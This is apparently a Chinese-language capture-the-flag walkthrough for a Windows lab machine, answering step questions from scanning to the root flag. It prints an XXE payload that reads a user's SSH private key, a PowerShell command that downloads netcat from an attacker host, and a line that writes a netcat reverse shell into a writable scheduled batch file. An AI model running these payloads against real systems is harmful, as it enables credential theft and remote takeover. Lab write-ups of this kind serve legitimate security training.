一、目标端口 80 上运行的是什么版本的 Apache?
1
2
3
#使用nmap扫描IP
nmap -sC -sV IP
2.4.41
二、什么用户名:密码组合登录成功?
1
2
#使用burp抓包进行爆破
admin:password

image-20230317152339788

image-20230317152410387

三、页面顶部接受用户输入的单词是什么?
1
order

image-20230317152537907

四、目标上使用的 XML 版本是什么?
1
2
#使用burp抓包
1.0

image-20230317152704149

五、XXE / XEE攻击首字母缩略词代表什么?
1
XML External Entity
六、我们可以在网页的 HTML 代码中找到什么用户名?
1
2
#使用burp抓包
Daniel

image-20230317161628037

七、目标上的Log-Management文件夹中的文件是什么?
1
2
3
4
5
6
7
8
9
#尝试用XXE漏洞读取Daniel用户的ssh私钥文件(注意后缀,一定是私钥)
#Payload
<?xml version = "1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///C:/Users/Daniel/.ssh/id_rsa" > ]>
<order><quantity>1</quantity><item>&xxe;</item><address>1111</address></order>
#使用ssh -i连接
ssh -i ./isa Daniel@IP
#在C盘上找到Log-Management
job.bat

image-20230320155059527

image-20230320170543465

八、前面提到的job.bat文件中提到了什么可执行文件?
1
2
3
#使用type查看job.bat文件内容
type job.bat
wevtutil.exe

image-20230320170708899

九、提交userflag
1
2
3
#user.txt在daniel的桌面上,可以使用for命令进行查找
for /r C: %i in (user.*) do echo %i
type C:\Users\daniel\Desktop\user.txt

image-20230320171641331

十、提交rootflag
1
2
3
4
5
6
7
8
#切换到powershell查看job.bat文件的权限,显示所有用户都可以修改文件
get-acl job.bat | fl
#使用powershell下载nc到本地
Powershell -c "IWR -useBasicParsing http://10.10.14.19/nc64.exe -o nc.exe"
#将nc命令写入job.bat(不要在powershell下运行,会报错)
echo C:\Users\Daniel\Desktop\nc.exe -e cmd.exe 10.10.14.19 4444> C:\Log-Management\job.bat
#切换到C盘,使用for命令查找root.txt
for /r %i in (root.*) do echo %i

image-20230320171847725

image-20230321102736275

image-20230321102801026

image-20230321103305525